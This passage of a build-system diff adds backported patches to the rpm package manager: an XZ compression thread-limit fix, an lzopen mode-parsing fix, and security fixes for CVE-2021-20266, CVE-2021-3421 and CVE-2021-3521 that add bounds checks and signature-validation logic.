++ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max);
+ rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and "
+ "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread);
++ uint64_t memory_usage_virt;
+ /* keep reducing the number of compression threads until memory
+ usage falls below the limit per CPU thread*/
+ while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) >
+ virtual_memlimit_per_cpu_thread) {
-+ /* If number of threads goes down to zero lzma_stream_encoder will
-+ * will return UINT64_MAX. We must check here to avoid an infinite loop.
++ /* If number of threads goes down to zero or in case of any other error
++ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check
++ * for both the cases here to avoid an infinite loop.
+ * If we get into situation that one thread requires more virtual memory
+ * than available we set one thread, print error message and try anyway. */
-+ if (--mt_options.threads == 0) {
++ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) {
+ mt_options.threads = 1;
+ rpmlog(RPMLOG_WARNING,
+ "XZ: Could not adjust number of threads to get below "
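A stand-alone sketch of the hardened adjustment loop described above: the thread count is reduced until the estimated encoder memory use fits the per-thread limit, and the loop also terminates if the estimate comes back as UINT64_MAX (the library's error value). estimate_memusage() is an illustrative stand-in for lzma_stream_encoder_mt_memusage():

    #include <stdint.h>

    /* Fake linear model standing in for lzma_stream_encoder_mt_memusage(). */
    static uint64_t estimate_memusage(uint32_t threads)
    {
        return (uint64_t)threads * 192u * 1024 * 1024;
    }

    static uint32_t pick_thread_count(uint32_t threads, uint64_t limit_per_thread)
    {
        uint64_t usage;

        while ((usage = estimate_memusage(threads)) > limit_per_thread) {
            /* stop on an error value or when no threads are left; fall back
             * to a single thread and try anyway */
            if (--threads == 0 || usage == UINT64_MAX) {
                threads = 1;
                break;
            }
        }
        return threads;
    }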
diff --git a/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
new file mode 100644
index 0000000000..9a5ebb9115
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
@@ -0,0 +1,34 @@
+From 405fc8998181353bd510864ca251dc233afec276 Mon Sep 17 00:00:00 2001
+From: Vitaly Chikunov <vt@altlinux.org>
+Date: Wed, 6 Jan 2021 23:43:41 +0300
+Subject: [PATCH] rpmio: Fix lzopen_internal mode parsing when 'Tn' is used
+
+When there is a number after "T" (suggested number of threads or "0" for
+getncpus), the lzopen_internal() mode parser would skip one byte, and when
+it's at the end of the string it would then parse undesired garbage from
+memory, causing intermittent compression failures.
+
+Fixes: 7740d1098 ("Add support for multithreaded xz compression")
+Signed-off-by: Vitaly Chikunov <vt@altlinux.org>
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/405fc8998181353bd510864ca251dc233afec276]
+
+---
+ rpmio/rpmio.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
+index ed1e25140..9d32ec6d9 100644
+--- a/rpmio/rpmio.c
++++ b/rpmio/rpmio.c
+@@ -798,6 +798,7 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+ * should've processed
+ * */
+ while (isdigit(*++mode));
++ --mode;
+ }
+ #ifdef HAVE_LZMA_MT
+ else
+--
+2.25.1
+
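A small demonstration of the off-by-one the one-line fix above addresses: after the digit-skipping loop, mode points at the first non-digit, and because the surrounding parser advances mode once more per iteration it must step back one character or it would skip that byte (and, at the end of the string, run past the terminator). skip_thread_count() is an illustrative wrapper, not rpm code:

    #include <ctype.h>
    #include <stdio.h>

    /* After the while loop, mode points at the first non-digit; step back one
     * character because the caller's parser will advance mode again itself. */
    static const char *skip_thread_count(const char *mode)
    {
        if (*mode == 'T' && isdigit((unsigned char)mode[1])) {
            while (isdigit((unsigned char)*++mode))
                ;
            --mode;
        }
        return mode;
    }

    int main(void)
    {
        /* the caller resumes parsing one character after the returned position */
        printf("%s\n", skip_thread_count("T0wx"));   /* prints "0wx" */
        return 0;
    }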
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
new file mode 100644
index 0000000000..f2fc47e321
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@
+From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <athena@invisiblethingslab.com>
+Date: Mon, 8 Feb 2021 16:05:01 -0500
+Subject: [PATCH] hdrblobInit() needs bounds checks too
+
+Users can pass untrusted data to hdrblobInit() and it must be robust
+against this.
+
+Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15]
+CVE: CVE-2021-20266
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ lib/header.c | 48 +++++++++++++++++++++++++++++++-----------------
+ 1 file changed, 31 insertions(+), 17 deletions(-)
+
+diff --git a/lib/header.c b/lib/header.c
+index 5b09f8352..ad5b6dc57 100644
+--- a/lib/header.c
++++ b/lib/header.c
+@@ -11,6 +11,7 @@
+ #include "system.h"
+ #include <netdb.h>
+ #include <errno.h>
++#include <inttypes.h>
+ #include <rpm/rpmtypes.h>
+ #include <rpm/rpmstring.h>
+ #include "lib/header_internal.h"
+@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob)
+ return NULL;
+ }
+
++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl,
++ char **emsg) {
++ uint32_t il_max = HEADER_TAGS_MAX;
++ uint32_t dl_max = HEADER_DATA_MAX;
++ if (regionTag == RPMTAG_HEADERSIGNATURES) {
++ il_max = 32;
++ dl_max = 8192;
++ }
++ if (hdrchkRange(il_max, il)) {
++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il);
++ return RPMRC_FAIL;
++ }
++ if (hdrchkRange(dl_max, dl)) {
++ rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl);
++ return RPMRC_FAIL;
++ }
++ return RPMRC_OK;
++}
++
+ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg)
+ {
+ int32_t block[4];
+@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ size_t nb;
+ rpmRC rc = RPMRC_FAIL; /* assume failure */
+ int xx;
+- int32_t il_max = HEADER_TAGS_MAX;
+- int32_t dl_max = HEADER_DATA_MAX;
+-
+- if (regionTag == RPMTAG_HEADERSIGNATURES) {
+- il_max = 32;
+- dl_max = 8192;
+- }
+
+ memset(block, 0, sizeof(block));
+ if ((xx = Freadall(fd, bs, blen)) != blen) {
+@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ goto exit;
+ }
+ il = ntohl(block[2]);
+- if (hdrchkRange(il_max, il)) {
+- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il);
+- goto exit;
+- }
+ dl = ntohl(block[3]);
+- if (hdrchkRange(dl_max, dl)) {
+- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl);
++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg))
+ goto exit;
+- }
+
+ nb = (il * sizeof(struct entryInfo_s)) + dl;
+ uc = sizeof(il) + sizeof(dl) + nb;
+@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc,
+ struct hdrblob_s *blob, char **emsg)
+ {
+ rpmRC rc = RPMRC_FAIL;
+-
+ memset(blob, 0, sizeof(*blob));
++ if (uc && uc < 8) {
++ rasprintf(emsg, _("hdr length: BAD"));
++ goto exit;
++ }
++
+ blob->ei = (int32_t *) uh; /* discards const */
+- blob->il = ntohl(blob->ei[0]);
+- blob->dl = ntohl(blob->ei[1]);
++ blob->il = ntohl((uint32_t)(blob->ei[0]));
++ blob->dl = ntohl((uint32_t)(blob->ei[1]));
++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK)
++ goto exit;
++
+ blob->pe = (entryInfo) &(blob->ei[2]);
+ blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) +
+ (blob->il * sizeof(*blob->pe)) + blob->dl;
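In essence the fix range-checks both counts read from an untrusted blob before any allocation or pointer arithmetic uses them. A minimal sketch with the signature-region limits from the patch (hdr_blob_ok() is an illustrative name):

    #include <stdbool.h>
    #include <stddef.h>
    #include <stdint.h>

    #define SIG_TAGS_MAX 32u        /* signature region: max tag count */
    #define SIG_DATA_MAX 8192u      /* signature region: max data bytes */

    static bool hdr_blob_ok(size_t uc, uint32_t il, uint32_t dl)
    {
        if (uc && uc < 8) {
            return false;           /* too small to even hold il and dl */
        }
        return il <= SIG_TAGS_MAX && dl <= SIG_DATA_MAX;
    }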
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
new file mode 100644
index 0000000000..b1a05b6863
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
@@ -0,0 +1,197 @@
+From 1e5b70cab83c95aa138107a38ecda75ff70e8985 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 24 Jun 2021 01:11:26 +0000
+Subject: [PATCH] Be much more careful about copying data from the signature
+ header
+
+Only look for known tags, and ensure correct type and size where known
+before copying over. Bump the old arbitrary 16k count limit to a 16M limit
+though; it's not inconceivable that a package could have that many files.
+While at it, ensure none of these tags exist in the main header,
+which would confuse us greatly.
+
+This is optimized for backporting ease, upstream can remove redundancies
+and further improve checking later.
+
+Reported and initial patches by Demi Marie Obenour.
+
+Fixes: RhBug:1935049, RhBug:1933867, RhBug:1935035, RhBug:1934125, ...
+
+Fixes: CVE-2021-3421, CVE-2021-20271
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/d6a86b5e69e46cc283b1e06c92343319beb42e21]
+CVE: CVE-2021-3421
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ lib/package.c | 115 ++++++++++++++++++++++++--------------------------
+ lib/rpmtag.h | 4 ++
+ 2 files changed, 58 insertions(+), 61 deletions(-)
+
+diff --git a/lib/package.c b/lib/package.c
+index 081123d84e..7c26ea323f 100644
+--- a/lib/package.c
++++ b/lib/package.c
+@@ -20,76 +20,68 @@
+
+ #include "debug.h"
+
++struct taglate_s {
++ rpmTagVal stag;
++ rpmTagVal xtag;
++ rpm_count_t count;
++} const xlateTags[] = {
++ { RPMSIGTAG_SIZE, RPMTAG_SIGSIZE, 1 },
++ { RPMSIGTAG_PGP, RPMTAG_SIGPGP, 0 },
++ { RPMSIGTAG_MD5, RPMTAG_SIGMD5, 16 },
++ { RPMSIGTAG_GPG, RPMTAG_SIGGPG, 0 },
++ /* { RPMSIGTAG_PGP5, RPMTAG_SIGPGP5, 0 }, */ /* long obsolete, dont use */
++ { RPMSIGTAG_PAYLOADSIZE, RPMTAG_ARCHIVESIZE, 1 },
++ { RPMSIGTAG_FILESIGNATURES, RPMTAG_FILESIGNATURES, 0 },
++ { RPMSIGTAG_FILESIGNATURELENGTH, RPMTAG_FILESIGNATURELENGTH, 1 },
++ { RPMSIGTAG_SHA1, RPMTAG_SHA1HEADER, 1 },
++ { RPMSIGTAG_SHA256, RPMTAG_SHA256HEADER, 1 },
++ { RPMSIGTAG_DSA, RPMTAG_DSAHEADER, 0 },
++ { RPMSIGTAG_RSA, RPMTAG_RSAHEADER, 0 },
++ { RPMSIGTAG_LONGSIZE, RPMTAG_LONGSIGSIZE, 1 },
++ { RPMSIGTAG_LONGARCHIVESIZE, RPMTAG_LONGARCHIVESIZE, 1 },
++ { 0 }
++};
++
+ /** \ingroup header
+ * Translate and merge legacy signature tags into header.
+ * @param h header (dest)
+ * @param sigh signature header (src)
+ */
+ static
+-void headerMergeLegacySigs(Header h, Header sigh)
++rpmTagVal headerMergeLegacySigs(Header h, Header sigh, char **msg)
+ {
+- HeaderIterator hi;
++ const struct taglate_s *xl;
+ struct rpmtd_s td;
+
+- hi = headerInitIterator(sigh);
+- for (; headerNext(hi, &td); rpmtdFreeData(&td))
+- {
+- switch (td.tag) {
+- /* XXX Translate legacy signature tag values. */
+- case RPMSIGTAG_SIZE:
+- td.tag = RPMTAG_SIGSIZE;
+- break;
+- case RPMSIGTAG_PGP:
+- td.tag = RPMTAG_SIGPGP;
+- break;
+- case RPMSIGTAG_MD5:
+- td.tag = RPMTAG_SIGMD5;
+- break;
+- case RPMSIGTAG_GPG:
+- td.tag = RPMTAG_SIGGPG;
+- break;
+- case RPMSIGTAG_PGP5:
+- td.tag = RPMTAG_SIGPGP5;
+- break;
+- case RPMSIGTAG_PAYLOADSIZE:
+- td.tag = RPMTAG_ARCHIVESIZE;
+- break;
+- case RPMSIGTAG_SHA1:
+- case RPMSIGTAG_SHA256:
+- case RPMSIGTAG_DSA:
+- case RPMSIGTAG_RSA:
+- default:
+- if (!(td.tag >= HEADER_SIGBASE && td.tag < HEADER_TAGBASE))
+- continue;
+- break;
+- }
+- if (!headerIsEntry(h, td.tag)) {
+- switch (td.type) {
+- case RPM_NULL_TYPE:
+- continue;
+- break;
+- case RPM_CHAR_TYPE:
+- case RPM_INT8_TYPE:
+- case RPM_INT16_TYPE:
+- case RPM_INT32_TYPE:
+- case RPM_INT64_TYPE:
+- if (td.count != 1)
+- continue;
+- break;
+- case RPM_STRING_TYPE:
+- case RPM_BIN_TYPE:
+- if (td.count >= 16*1024)
+- continue;
+- break;
+- case RPM_STRING_ARRAY_TYPE:
+- case RPM_I18NSTRING_TYPE:
+- continue;
+- break;
+- }
+- (void) headerPut(h, &td, HEADERPUT_DEFAULT);
+- }
++ rpmtdReset(&td);
++ for (xl = xlateTags; xl->stag; xl++) {
++ /* There mustn't be one in the main header */
++ if (headerIsEntry(h, xl->xtag))
++ break;
++ if (headerGet(sigh, xl->stag, &td, HEADERGET_RAW|HEADERGET_MINMEM)) {
++ /* Translate legacy tags */
++ if (xl->stag != xl->xtag)
++ td.tag = xl->xtag;
++ /* Ensure type and tag size match expectations */
++ if (td.type != rpmTagGetTagType(td.tag))
++ break;
++ if (td.count < 1 || td.count > 16*1024*1024)
++ break;
++ if (xl->count && td.count != xl->count)
++ break;
++ if (!headerPut(h, &td, HEADERPUT_DEFAULT))
++ break;
++ rpmtdFreeData(&td);
++ }
++ }
++ rpmtdFreeData(&td);
++
++ if (xl->stag) {
++ rasprintf(msg, "invalid signature tag %s (%d)",
++ rpmTagGetName(xl->xtag), xl->xtag);
+ }
+- headerFreeIterator(hi);
++
++ return xl->stag;
+ }
+
+ /**
+@@ -337,7 +329,8 @@ rpmRC rpmReadPackageFile(rpmts ts, FD_t fd, const char * fn, Header * hdrp)
+ goto exit;
+
+ /* Append (and remap) signature tags to the metadata. */
+- headerMergeLegacySigs(h, sigh);
++ if (headerMergeLegacySigs(h, sigh,&msg))
++ goto exit;
+ applyRetrofits(h);
+
+ /* Bump reference count for return. */
+diff --git a/lib/rpmtag.h b/lib/rpmtag.h
+index 8c718b31b5..d562572c6f 100644
+--- a/lib/rpmtag.h
++++ b/lib/rpmtag.h
+@@ -65,6 +65,8 @@ typedef enum rpmTag_e {
+ RPMTAG_LONGARCHIVESIZE = RPMTAG_SIG_BASE+15, /* l */
+ /* RPMTAG_SIG_BASE+16 reserved */
+ RPMTAG_SHA256HEADER = RPMTAG_SIG_BASE+17, /* s */
++ /* RPMTAG_SIG_BASE+18 reserved for RPMSIGTAG_FILESIGNATURES */
++ /* RPMTAG_SIG_BASE+19 reserved for RPMSIGTAG_FILESIGNATURELENGTH */
+
+ RPMTAG_NAME = 1000, /* s */
+ #define RPMTAG_N RPMTAG_NAME /* s */
+@@ -422,6 +424,8 @@ typedef enum rpmSigTag_e {
+ RPMSIGTAG_LONGSIZE = RPMTAG_LONGSIGSIZE, /*!< internal Header+Payload size (64bit) in bytes. */
+ RPMSIGTAG_LONGARCHIVESIZE = RPMTAG_LONGARCHIVESIZE, /*!< internal uncompressed payload size (64bit) in bytes. */
+ RPMSIGTAG_SHA256 = RPMTAG_SHA256HEADER,
++ RPMSIGTAG_FILESIGNATURES = RPMTAG_SIG_BASE + 18,
++ RPMSIGTAG_FILESIGNATURELENGTH = RPMTAG_SIG_BASE + 19,
+ } rpmSigTag;
+
+
+--
+2.17.1
+
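The core idea is a fixed whitelist table: only listed tags are copied from the attacker-controlled signature header, and each entry pins the expected element count. A compact sketch with made-up tag numbers (the real table uses the RPMSIGTAG_ and RPMTAG_ constants):

    #include <stdbool.h>
    #include <stdint.h>

    struct xlate {
        int src_tag;        /* tag in the signature header */
        int dst_tag;        /* tag it maps to in the main header */
        uint32_t count;     /* expected element count, 0 = any */
    };

    /* Made-up tag numbers; the real table uses RPMSIGTAG_ and RPMTAG_ values. */
    static const struct xlate xlate_table[] = {
        { 1000, 257, 1 },   /* e.g. size -> SIGSIZE, exactly one element */
        { 1004, 261, 16 },  /* e.g. md5  -> SIGMD5, exactly 16 bytes */
        { 0, 0, 0 }
    };

    static bool count_ok(const struct xlate *xl, uint32_t count)
    {
        if (count < 1 || count > 16u * 1024 * 1024) {
            return false;                   /* global sanity bound */
        }
        return xl->count == 0 || count == xl->count;
    }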
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
new file mode 100644
index 0000000000..0882d6f310
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
@@ -0,0 +1,60 @@
+From b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:51:10 +0300
+Subject: [PATCH] Process MPI's from all kinds of signatures
+
+No immediate effect but needed by the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index ee5c81e246..340de5fc9a 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -511,7 +511,7 @@ pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
+ return NULL;
+ }
+
+-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
++static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
+ const uint8_t *p, const uint8_t *h, size_t hlen,
+ pgpDigParams sigp)
+ {
+@@ -524,10 +524,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
+ int mpil = pgpMpiLen(p);
+ if (p + mpil > pend)
+ break;
+- if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
+- if (sigalg->setmpi(sigalg, i, p))
+- break;
+- }
++ if (sigalg->setmpi(sigalg, i, p))
++ break;
+ p += mpil;
+ }
+
+@@ -600,7 +598,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ }
+
+ p = ((uint8_t *)v) + sizeof(*v);
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ case 4:
+ { pgpPktSigV4 v = (pgpPktSigV4)h;
+@@ -658,7 +656,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ if (p > (h + hlen))
+ return 1;
+
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ default:
+ rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
new file mode 100644
index 0000000000..c5f88a8c72
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
@@ -0,0 +1,55 @@
+From 9f03f42e2614a68f589f9db8fe76287146522c0c Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:56:20 +0300
+Subject: [PATCH] Refactor pgpDigParams construction to helper function
+
+No functional changes, just to reduce code duplication and needed by
+the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/9f03f42e2614a68f589f9db8fe76287146522c0c]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index 340de5fc9a..aad7c275c9 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1055,6 +1055,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
+ return algo;
+ }
+
++static pgpDigParams pgpDigParamsNew(uint8_t tag)
++{
++ pgpDigParams digp = xcalloc(1, sizeof(*digp));
++ digp->tag = tag;
++ return digp;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+@@ -1072,8 +1079,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ if (pkttype && pkt.tag != pkttype) {
+ break;
+ } else {
+- digp = xcalloc(1, sizeof(*digp));
+- digp->tag = pkt.tag;
++ digp = pgpDigParamsNew(pkt.tag);
+ }
+ }
+
+@@ -1121,8 +1127,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
+ digps = xrealloc(digps, alloced * sizeof(*digps));
+ }
+
+- digps[count] = xcalloc(1, sizeof(**digps));
+- digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
++ digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
+ /* Copy UID from main key to subkey */
+ digps[count]->userid = xstrdup(mainkey->userid);
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
new file mode 100644
index 0000000000..fd31f11beb
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
@@ -0,0 +1,34 @@
+From 5ff86764b17f31535cb247543a90dd739076ec38 Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <demi@invisiblethingslab.com>
+Date: Thu, 6 May 2021 18:34:45 -0400
+Subject: [PATCH] Do not allow extra packets to follow a signature
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+According to RFC 4880 § 11.4, a detached signature is “simply a
+Signature packet”. Therefore, extra packets following a detached
+signature are not allowed.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/5ff86764b17f31535cb247543a90dd739076ec38]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index f1a99e7169..5b346a8253 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1068,6 +1068,8 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ break;
+
+ p += (pkt.body - pkt.head) + pkt.blen;
++ if (pkttype == PGPTAG_SIGNATURE)
++ break;
+ }
+
+ rc = (digp && (p == pend)) ? 0 : -1;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
new file mode 100644
index 0000000000..cb9e9842fe
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
@@ -0,0 +1,330 @@
+From bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:59:30 +0300
+Subject: [PATCH] Validate and require subkey binding signatures on PGP public
+ keys
+
+All subkeys must be followed by a binding signature by the primary key
+as per the OpenPGP RFC; enforce their presence and validity in the parser.
+
+The implementation is as kludgey as they come to work around our
+simple-minded parser structure without touching API, to maximise
+backportability. Store all the raw packets internally as we decode them
+to be able to access previous elements at will, needed to validate ordering
+and access the actual data. Add testcases for manipulated keys whose
+import previously would succeed.
+
+Depends on the two previous commits:
+7b399fcb8f52566e6f3b4327197a85facd08db91 and
+236b802a4aa48711823a191d1b7f753c82a89ec5
+
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8]
+Comment: Hunk refreshed
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+Fixes CVE-2021-3521.
+---
+ rpmio/rpmpgp.c | 98 +++++++++++++++++--
+ tests/Makefile.am | 3 +
+ tests/data/keys/CVE-2021-3521-badbind.asc | 25 +++++
+ .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
+ tests/data/keys/CVE-2021-3521-nosubsig.asc | 37 +++++++
+ tests/rpmsigdig.at | 28 ++++++
+ 6 files changed, 209 insertions(+), 7 deletions(-)
+ create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index aad7c275c9..d70802ae86 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1004,37 +1004,121 @@ static pgpDigParams pgpDigParamsNew(uint8_t tag)
+ return digp;
+ }
+
++static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
++{
++ int rc = -1;
++ if (pkt->tag == exptag) {
++ uint8_t head[] = {
++ 0x99,
++ (pkt->blen >> 8),
++ (pkt->blen ),
++ };
++
++ rpmDigestUpdate(hash, head, 3);
++ rpmDigestUpdate(hash, pkt->body, pkt->blen);
++ rc = 0;
++ }
++ return rc;
++}
++
++static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
++ const struct pgpPkt *all, int i)
++{
++ int rc = -1;
++ DIGEST_CTX hash = NULL;
++
++ switch (selfsig->sigtype) {
++ case PGPSIGTYPE_SUBKEY_BINDING:
++ hash = rpmDigestInit(selfsig->hash_algo, 0);
++ if (hash) {
++ rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
++ if (!rc)
++ rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
++ }
++ break;
++ default:
++ /* ignore types we can't handle */
++ rc = 0;
++ break;
++ }
++
++ if (hash && rc == 0)
++ rc = pgpVerifySignature(key, selfsig, hash);
++
++ rpmDigestFinal(hash, NULL, NULL, 0);
++
++ return rc;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+ const uint8_t *p = pkts;
+ const uint8_t *pend = pkts + pktlen;
+ pgpDigParams digp = NULL;
+- struct pgpPkt pkt;
++ pgpDigParams selfsig = NULL;
++ int i = 0;
++ int alloced = 16; /* plenty for normal cases */
++ struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
+ int rc = -1; /* assume failure */
++ int expect = 0;
++ int prevtag = 0;
+
+ while (p < pend) {
+- if (decodePkt(p, (pend - p), &pkt))
++ struct pgpPkt *pkt = &all[i];
++ if (decodePkt(p, (pend - p), pkt))
+ break;
+
+ if (digp == NULL) {
+- if (pkttype && pkt.tag != pkttype) {
++ if (pkttype && pkt->tag != pkttype) {
+ break;
+ } else {
+- digp = pgpDigParamsNew(pkt.tag);
++ digp = pgpDigParamsNew(pkt->tag);
+ }
+ }
+
+- if (pgpPrtPkt(&pkt, digp))
++ if (expect) {
++ if (pkt->tag != expect)
++ break;
++ selfsig = pgpDigParamsNew(pkt->tag);
++ }
++
++ if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
+ break;
+
+- p += (pkt.body - pkt.head) + pkt.blen;
++ if (selfsig) {
++ /* subkeys must be followed by binding signature */
++ if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
++ if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
++ break;
++ }
++
++ int xx = pgpVerifySelf(digp, selfsig, all, i);
++
++ selfsig = pgpDigParamsFree(selfsig);
++ if (xx)
++ break;
++ expect = 0;
++ }
++
